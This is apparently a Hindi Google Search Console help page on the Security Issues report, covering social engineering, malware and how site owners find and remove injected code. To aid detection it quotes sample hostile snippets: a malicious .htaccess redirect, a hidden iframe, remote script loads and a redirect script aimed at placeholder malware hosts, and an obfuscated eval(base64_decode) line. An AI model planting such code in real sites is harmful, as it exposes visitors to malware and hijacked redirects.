सुरक्षा की समस्याओं वाली रिपोर्ट

अगर Google की समीक्षा से पता चलता है कि आपकी साइट हैक की गई थी या आपकी साइट की किसी गतिविधि से वेबसाइट पर आने वालों या उनके कंप्यूटर को नुकसान पहुंच सकता है, तो सुरक्षा की समस्याओं वाली रिपोर्ट में Google इसकी जानकारी देगा. साइट इस्तेमाल करने वाले लोगों के कंप्यूटर पर फ़िशिंग हमले या मैलवेयर या अनचाहे साॅफ़्टवेयर इंस्टाॅल होना, नुकसान पहुंचाने वाली ऐसी गतिविधियों के उदाहरण हैं.

जिन पेजों या साइटों में सुरक्षा की समस्या है, वे खोज नतीजों में चेतावनी वाले लेबल के साथ दिखाई दे सकते हैं. साथ ही, इन्हें एक्सेस करने की कोशिश करते समय पेजों के खुलने से पहले ही उपयोगकर्ता को ब्राउज़र में चेतावनी वाला पेज दिखाई दे सकता है.

सुरक्षा की समस्याओं वाली रिपोर्ट खोलें

 

सुरक्षा की समस्याएं क्या होती हैं?

सुरक्षा की समस्याओं को इन श्रेणियों में बाँटा गया है:

  • हैक की गई सामग्री: यह ऐसी कोई भी सामग्री हो सकती है जो आपकी मंज़ूरी के बगैर आपकी साइट पर डाल दी जाती है. ऐसा आपकी साइट में सुरक्षा की कमियों की वजह से होता है. हमारे उपयोगकर्ताओं की सुरक्षा के लिए, Google पूरी कोशिश करता है कि खोज नतीजों में हैक की गई सामग्री न दिखाई दे. ज़्यादा जानें.
  • मैलवेयर और अनचाहा सॉफ़्टवेयर: यह सॉफ़्टवेयर उपयोगकर्ताओं या उनके डिवाइस को नुकसान पहुंचाने के लिए बनाया जाता है. ऐसे सॉफ़्टवेयर से उपयोगकर्ताओं के साथ धोखाधड़ी की जाती है या उनके डिवाइस पर ऐसी गतिविधियां की जाती हैं, जिनके बारे में उन्हें पता नहीं होता. इसके अलावा, इसकी वजह से उपयोगकर्ताओं को डिवाइस इस्तेमाल करने में परेशानी होती है. ज़्यादा जानें.
  • साेशल इंजीनियरिंग: यह ऐसी सामग्री होती है जिसका इस्तेमाल करके साइट पर आने वाले लाेगाें काे गुमराह किया जाता है. साथ ही, ऐसी गतिविधियां कराने की कोशिश की जाती है, जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. ज़्यादा जानें.

क्या मेरी साइट में सुरक्षा की समस्याएं हैं?

अगर आपकी साइट में सुरक्षा की समस्याएं हैं, तो आपको रिपोर्ट के सबसे ऊपरी हिस्से में अपनी साइट में मौजूद सुरक्षा समस्याओं की कुल संख्या दिखाई देगी.

अगर आपकी साइट में सुरक्षा की समस्याएं नहीं हैं, तो आपको हरे रंग के गोले में सही का निशान और इस बारे में एक मैसेज दिखाई देगा.

हालांकि, मैंने यह साइट हाल ही में खरीदी है!

अगर आपने हाल ही में कोई ऐसी साइट खरीदी है जिसमें पहले से ही सुरक्षा की समस्याएं थीं, तो पहले रिपोर्ट में दी गईं सभी समस्याओं को ठीक करें. इसके बाद, साइट की फिर से समीक्षा करने के लिए अनुरोध करें और हमें यह जानकारी दें कि आपने यह साइट हाल ही में खरीदी है और अब यह साइट वेबमास्टर के लिए बने Google के दिशा-निर्देशों का पालन करती है.

किन पेजों में सुरक्षा की समस्याएं हैं?

सुरक्षा की समस्याओं के उदाहरण वाले यूआरएल की सूची देखने के लिए, किसी एक तरह की समस्या की जानकारी वाला सेक्शन बड़ा करके देखें. इस सूची में शायद समस्या वाले सभी पेज शामिल न हों, लेकिन इसमें आपकी साइट के कुछ ऐसे पेज दिखाई देंगे, जिन पर आपकी चुनी गई समस्या मौजूद है. कभी-कभी ऐसा भी हो सकता है कि आपको रिपोर्ट में सुरक्षा की समस्या दिखाई दे, लेकिन उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है क्योंकि कुछ वजहों से हम समस्या के उदाहरण के लिए जानकारी नहीं जुटा पाते.

समस्या की जानकारी में, आपकी साइट पर पहली बार समस्या के बारे में पता चलने की तारीख दी गई होती है. साथ ही, थोड़े शब्दों में समस्या की जानकारी और समस्या के बारे में ज़्यादा जानने के लिए एक लिंक दिया गया होता है.

समस्या ठीक करना

अपनी साइट में सुरक्षा की समस्या ठीक करने के लिए:

  1. सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या की जानकारी वाला सेक्शन बड़ा करके देखें.
  2. समस्या की जानकारी पढ़ें. साथ ही, समस्या के बारे में ज़्यादा जानकारी पाने और उसे ठीक करने का तरीका जानने के लिए, "ज़्यादा जानें" लिंक पर क्लिक करें. ('ज़्यादा जानें' लिंक आपको इस पेज पर नीचे दी गई जानकारी तक ले जाएगा.)
  3. सुरक्षा की समस्या को ठीक करने के लिए, जानकारी वाले सेक्शन में असुरक्षित पेज के तौर पर बताए गए पेजों का इस्तेमाल करें. इस सूची में शायद समस्या वाले सभी पेज शामिल न हों, लेकिन इसमें आपकी साइट के कुछ ऐसे पेज होते हैं जिनमें यह समस्या मौजूद है. शायद आपको रिपोर्ट में सुरक्षा की ऐसी समस्या दिखाई दे, जिसके लिए उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है क्योंकि कुछ वजहों से हम समस्या का उदाहरण देने के लिए जानकारी नहीं जुटा पाते.
  4. अपनी साइट की सभी समस्याओं को ठीक करें. सिर्फ़ कुछ पेजों में समस्याएं ठीक करने से, उन पेजों या आपकी साइट के कुछ हिस्सों को खोज नतीजों में शामिल नहीं किया जाएगा.
  5. अगर आपकी साइट की रिपोर्ट में एक से ज़्यादा सुरक्षा की समस्याएं हैं, तो उन सभी समस्याओं की ठीक करें.
  6. समस्याओं को ठीक करने के बाद, उनकी जाँच करें.
  7. रिपोर्ट में बताई गईं सभी समस्याओं को सभी पेजों में ठीक करने के बाद, रिपोर्ट में समीक्षा करने का अनुरोध करें विकल्प चुनें. साइट की फिर से समीक्षा करने का अनुरोध करते समय, ठीक की गईं गड़बड़ियों की जानकारी दें. अच्छे अनुरोध में तीन चीज़ें शामिल होती हैं:
    • साइट की क्वालिटी में हुई समस्या की सटीक जानकारी.
    • समस्या को ठीक करने के लिए उठाए गए कदमों की जानकारी.
    • समस्या को ठीक करने की हर कोशिश के नतीजों की जानकारी.
  8. साइट की फिर से समीक्षा करने में एक या दो हफ़्ते लग सकते हैं. आपको ईमेल से यह सूचना दी जाएगी कि आपकी समीक्षा पर कितना काम हुआ है. अनुरोध किए जाने पर आपको समीक्षा की पुष्टि वाला एक मैसेज मिलेगा ताकि आपको यह पता चल जाए कि आपकी साइट की समीक्षा की जा रही है. जब तक आपको पिछले अनुरोधों पर कोई आखिरी फ़ैसला नहीं मिल जाता तब तक फिर से समीक्षा करने का अनुरोध न करें.

साइट की फिर से समीक्षा होने में कितना समय लगेगा?

एक से दो हफ़्ते लग सकते हैं. साइट की समीक्षा करने का अनुरोध मिलने के बाद, हम आपको ईमेल से इसकी सूचना देंगे ताकि आपको पता चल जाए कि आपके अनुरोध पर कार्रवाई की जा रही है. समीक्षा पूरी होने पर भी आपको इस बारे में ईमेल से जानकारी भेजी जाएगी.

जब तक आपके पिछले अनुरोधों पर फ़ैसला न मिल जाए, कृपया अपनी साइट की फिर से समीक्षा करने का अनुरोध न करें. अगर आप साइट की समस्याओं को ठीक किए बगैर ही साइट की फिर से समीक्षा करने के लिए अनुरोध करते हैं, तो आपके अगले अनुरोध का जवाब मिलने में ज़्यादा समय लग सकता है. साथ ही, आपकी पहचान बार-बार ऐसे उल्लंघन करने वाले के तौर पर की जा सकती है.

सुरक्षा की समस्याओं वाली सूची

यहां पर साइट में हुई सुरक्षा की समस्याओं वाली सूची दी गई है. साथ ही, हर समस्या को ठीक करने का तरीका बताया गया है.

धोखाधड़ी की सामग्री वाले पेज

आपकी साइट पर ऐसी सामग्री मौजूद हो सकती है जिससे साइट पर आने वाले लाेगाें काे गुमराह किया जाए. ऐसा करके उनसे ऐसी गतिविधियां कराने की कोशिश की जाती है जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. Google सुरक्षित ब्राउज़िंग की मदद से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है, जिन पर लगातार धोखाधड़ी वाली सामग्री मौजूद रहती है.

वेब पेजों को धोखाधड़ी की सामग्री वाला पेज तब माना जाता है जब वे:

  • किसी भराेसेमंद इकाई की नकल करें या उस जैसा व्यवहार करें, जैसे कि आपके डिवाइस या ब्राउज़र या किसी वेबसाइट की तरह या
  • आपको गुमराह करके ऐसा काम कराने की कोशिश करते हैं जाे आप सिर्फ़ किसी भराेसेमंद इकाई के लिए करेंगे. उदाहरण के लिए, कोई पासवर्ड शेयर करना, तकनीकी सहायता के किसी नंबर पर कॉल करना या सॉफ़्टवेयर डाउनलोड करना.

इस तरह की धोखाधड़ी वाली सामग्री को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी की सामग्री वाले पेजों के उदाहरण देखें.

समस्या ठीक करना

1. पता करें कि समस्या क्या है

धोखाधड़ी वाली सामग्री का पता लगाने के लिए, उदाहरण वाले पेजों पर जाएं. आप यूआरएल की जाँच करने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप दोनों वर्शन में देख सकते हैं.

2. पेजों में समस्याएं ठीक करें

साेशल इंजीनियरिंग की सामग्री वाले पेजों की समस्याएं ठीक करें. अगर आपको लगता है कि सुरक्षित ब्राउज़िंग इस्तेमाल करके किसी वेब पेज की समस्या वाले पेज के तौर पर गलती से पहचान हुई है, तो कृपया यहां रिपोर्ट करें.

3. सुरक्षा की समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

धोखाधड़ी के लिए साइट में एम्बेड किए गए संसाधन

आपकी साइट में धोखाधड़ी वाले विज्ञापन या संसाधन एम्बेड किए गए हैं. ये आपकी साइट पर आने वाले लाेगाें काे गुमराह करके ऐसी गतिविधियां कराने की कोशिश करते हैं, जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या अनचाहे सॉफ़्टवेयर डाउनलाेड करना शामिल है. धोखाधड़ी वाली सामग्री पेज में एम्बेड किए गए संसाधनों, जैसे इमेज, तीसरे-पक्ष की सामग्रियों या विज्ञापनों से साइट में शामिल की जा सकती है. Google सुरक्षित ब्राउज़िंग की मदद से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है जिन पर लगातार धोखाधड़ी वाली सामग्री मौजूद रहती है.

कभी-कभी उपयोगकर्ताओं को यह सामग्री होस्ट पेज पर दिखाई देती है. दूसरे मामलों में, होस्ट साइट पर कोई विज्ञापन दिखाई नहीं देता. हालांकि पॉप-अप, पॉप-अंडर या दूसरी तरह के रीडायरेक्ट इस्तेमाल करके उपयाेगकर्ताओं काे नुकसान पहुंंचाने वाले पेजाें पर ले जाया जाता है. सभी मामलों में, साइट में ऐसी सामग्री एम्बेड होने पर, इसे होस्ट पेज के लिए नीति का उल्लंघन माना जाएगा.

इस तरह की धोखाधड़ी वाली सामग्री को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी के लिए साइट में एम्बेड किए गए संसाधनों के उदाहरण देखें.

समस्या ठीक करना

1. पता करें कि समस्या क्या है

धोखाधड़ी वाली सामग्री का पता लगाने के लिए, उदाहरण वाले पेजों पर जाएं. इस बात की पुष्टि करें कि आपकी साइट के किसी भी पेज पर धोखाधड़ी वाला कोई विज्ञापन, इमेज या तीसरे पक्ष का एम्बेड किया गया कोई और संसाधन मौजूद न हो. ध्यान दें कि विज्ञापन नेटवर्क वाली कंपनियां, आपकी साइट पर दिखाए जाने वाले विज्ञापन बदल सकती हैं. इसलिए, साेशल इंजीनियरिंग वाला विज्ञापन देखने के लिए शायद आपको कुछ बार पेज रीफ़्रेश करना पड़े. कुछ विज्ञापन मोबाइल डिवाइस और डेस्कटॉप कंप्यूटर पर अलग-अलग तरह से दिखाई दे सकते हैं. आप यूआरएल की जाँच करने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप दोनों वर्शन में देख सकते हैं.

2. धोखाधड़ी वाले विज्ञापनों या संसाधनों को साइट से हटाएं

अपनी साइट में शामिल तीसरे पक्ष के संसाधनों की जाँच करें. देख लें कि आपकी साइट के किसी भी पेज पर मौजूद विज्ञापनों, इमेज या एम्बेड किए गए तीसरे पक्ष के संसाधनाें में धोखाधड़ी वाली सामग्री शामिल न हो. साेशल इंजीनियरिंग की सामग्री वाले पेजों की समस्याएं ठीक करें. 

3. सुरक्षा की समीक्षा के लिए अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

मैलवेयर
नुकसान पहुंचाने वाले किसी हैकर ने आपकी साइट में मैलवेयर इस्तेमाल करके कुछ गड़बड़ी की है या साइट पर मैलवेयर डाल दिया है. मैलवेयर एक तरह का सॉफ़्टवेयर या मोबाइल ऐप्लिकेशन होता है. खास तौर पर, इसे किसी कंप्यूटर, मोबाइल डिवाइस, उन पर इस्तेमाल होने वाले सॉफ़्टवेयर या उनका इस्तेमाल करने वालों को नुकसान पहुंचाने के लिए बनाया जाता है.

1. समस्या को ठीक करने का तरीका

अपनी साइट पर मैलवेयर की समस्या को ठीक करने के लिए, उस पर मौजूद कोड को पढ़ना और समझना ज़रूरी है. साथ ही, साइट के वेब सर्वर कॉन्फ़िगरेशन की जानकारी होना ज़्यादा मददगार हो सकता है. अगर आपको लगता है कि आप इस समस्या को खुद नहीं सुलझा सकते, तो मदद पाने के लिए सहायता टीम बनाएं लेख पढ़ें.

2. अपनी साइट में मैलवेयर की समस्या का पता लगाएं और उसे ठीक करें

मैलवेयर कई तरह के होते हैं. साइट में किसी खास तरह के मैलवेयर के बारे में पता लगाने और उसे ठीक करने के लिए, इन सेक्शन को पढ़ें. ध्यान दें कि आपकी साइट में एक से ज़्यादा तरह के मैलवेयर हो सकते हैं. इसलिए, अपनी साइट की अच्छी तरह से जाँच करें और समस्याओं को ठीक करें.

मैलवेयर का प्रकार: सर्वर कॉन्फ़िगरेशन

जानकारी

किसी हैकर ने आपकी साइट में छेड़छाड़ की है और आपकी सुरक्षित साइट पर आने वाले लोगों को आपकी साइट से रीडायरेक्ट करके उनकी मैलवेयर हमलों वाली साइट पर भेज रहा है. ऐसा करने लिए, शायद उसने आपके वेब सर्वर की कॉन्फ़िगरेशन फ़ाइल (फ़ाइलों) में बदलाव किया है. आम तौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर htaccess फ़ाइल और httpd.conf दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.

समस्या को ठीक करना

1. समस्या का पता लगाएं

सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या के उदाहरण वाले यूआरएल पर जाएं.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

"सर्वर कॉन्फ़िगरेशन" मैलवेयर की समस्या वाले पेजों को cURL या Wget से देखने पर, उनके हेडर में आपको ये कोड दिखाई दे सकते हैं:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. "सर्वर कॉन्फ़िगरेशन" मैलवेयर की समस्या वाली अपनी साइट ठीक करें

शेल/टर्मिनल इस्तेमाल करके अपने सर्वर में लॉग इन करें (अगर आप चाहें, तो साइट को ऑफ़लाइन कर सकते हैं) और मैलवेयर की समस्या वाली सर्वर कॉन्फ़िगरेशन फ़ाइलों की समीक्षा करें. आपकी साइट पर हैक की गईं सर्वर कॉन्फ़िगरेशन वाली एक से ज़्यादा फ़ाइलें हो सकती हैं. इन फ़ाइलों में ऐसे निर्देश ढूंढें, जिन्हें आपने तय नहीं किया है. जैसे कि रीडायरेक्ट करने वाले निर्देश, जिससे उपयोगकर्ताओं को आपकी साइट से मैलवेयर हमले वाली अनजान साइटों पर भेजा जाता है. उदाहरण के लिए, .htaccess फ़ाइल में आपको इस तरह का रीडायरेक्ट दिख सकता है:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

इसके अलावा:

  • हैकर फ़ाइल के आखिरी हिस्से में ऐसी जगह पर मैलवेयर वाला कोड जोड़ सकता है, जहां हम उसे आसानी से न ढूंढ पाएं. इसलिए, पूरी फ़ाइल की अच्छी तरह से जाँच कर लें.
  • देखें कि क्या हैकर ने किसी ऐसी क्राॅन सुविधा का इस्तेमाल किया है जिससे .htaccess फ़ाइल अपने आप लगातार अपडेट हो रही है. क्राॅन सुविधा का इस्तेमाल कई जगहों पर किया जा सकता है जिनमें /etc/crontab (साथ ही, कई /etc/cron* डायरेक्ट्री) और /var/spool/cron शामिल हैं.
  • अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को दोबारा ठीक करने का तरीका बताने वाला गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं.
मैलवेयर का प्रकार: एसक्यूएल इंजेक्शन

जानकारी

किसी हैकर ने शायद आपकी साइट के डेटाबेस में छेड़छाड़ की है. उदाहरण के लिए, शायद उसने किसी प्रोग्राम का इस्तेमाल करके डेटाबेस टेबल की सभी जानकारियों में मैलवेयर वाला कोड डाल दिया हो. इसलिए जब सर्वर किसी ऐसे पेज को लोड करेगा, जिसके लिए डेटाबेस की जानकारी इस्तेमाल की गई हो, तो उस पेज की सामग्री में एम्बेड किया गया मैलवेयर वाला कोड भी उस पेज के साथ लोड हो जाएगा. इस कोड की वजह से साइट का इस्तेमाल करने वालों को नुकसान पहुंच सकता है.

समस्या को ठीक करना

1. पता करें कि समस्या क्या है

जिन यूआरएल में समस्या है, उन पर कमांड-लाइन में कुछ क्वेरी चलाएं. साथ ही, क्वेरी के जवाब में खुलने वाले पेज पर देखें कि "iframe" या "eval" जैसे नुकसान पहुंचाने वाले एसक्यूएल शब्द मौजूद हैं या नहीं.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

इसके बाद, अपने डेटाबेस के सर्वर में लॉग इन करें या phpMyAdmin जैसे किसी टूल की मदद से अपने डेटाबेस को देखें. अगर आपने Wget या cURL का इस्तेमाल किया है, तो Wget या cURL से पेज के सोर्स कोड में मिली गड़बड़ी की तुलना अपने डेटाबेस की एंट्री से करें. उदाहरण के लिए, अगर आपको अपने पेजों पर कोई खतरनाक iframe मिला है, तो आप iframe कोड खोजने के लिए एसक्यूएल क्वेरी कर सकते हैं. उदाहरण के लिए:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

आप असामान्य गतिविधियों का पता लगाने के लिए सर्वर पर मौजूद डेटाबेस के लॉग और गड़बड़ी वाली फ़ाइलों की जाँच ज़रूर करना चाहेंगे. उदाहरण के लिए, ऐसे एसक्यूएल कमांड जो आमतौर पर नहीं दिखते हैं और जो नियमित उपयोगकर्ता या गड़बड़ी के लिए असामान्य दिखते हैं.

2. अपनी साइट से मैलवेयर निकालें

जब आप अपनी साइट से मैलवेयर निकालने के लिए तैयार हो जाएं, तो डेटाबेस के उन सभी रिकॉर्ड को अपडेट कर सकते हैं जिसमें समस्या है. इसके अलावा, आप डेटाबेस के उस बैकअप को भी बहाल कर सकते हैं जिसमें कोई समस्या नहीं है.

इसके अलावा:

मैलवेयर का प्रकार: कोड इंजेक्शन

समस्या के बारे में जानकारी

आपकी साइट के पेजों में बदलाव किया गया था ताकि उसमें नुकसान पहुंचाने वाले कोड को शामिल किया जा सके. उदाहरण के लिए, जिस साइट पर मैलवेयर ने हमला किया है उसमें iframe को शामिल करना.

समस्या को ठीक करना

1. पता करें कि समस्या क्या है

सुरक्षा की समस्याओं वाली रिपोर्ट में उन यूआरएल की सूची दी गई है जिनमें समस्या है. सूची में शामिल यूआरएल पर जाएं. यूआरएल की मदद से खुले पेज के एचटीएमएल में मैलवेयर वाले कोड की जाँच करें.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

नीचे मैलवेयर वाले कोड के कुछ उदाहरण दिए गए हैं:

  • वो iframe जो एक मैलवेयर वाले साइट को लोड करता है:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • ऐसी JavaScript या और कोई स्क्रिप्टिंग की भाषा जो हमलावर साइट से स्क्रिप्ट को कॉल करती और चलाती है:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • ऐसी स्क्रिप्टिंग जो ब्राउज़र को एक हमलावर साइट पर रीडायरेक्ट करती है:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • ऐसे मैलवेयर वाले कोड जिन्हें पता लगने से बचाने के लिए बदल दिया गया है:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • शेयर की गईं ऐसी ऑब्जेक्ट फ़ाइलें जिन्हें आम तौर पर सुरक्षित माने जानी वाली स्क्रिप्ट से छेड़छाड़ करने के लिए बनाया जाता है. ये फ़ाइलें इस्तेमाल करके नुकसान पहुंचाने वाले कोड को बिना किसी तय तरीके के स्क्रिप्ट में डाला जाता है:
    #httpd.conf modified by the hacker
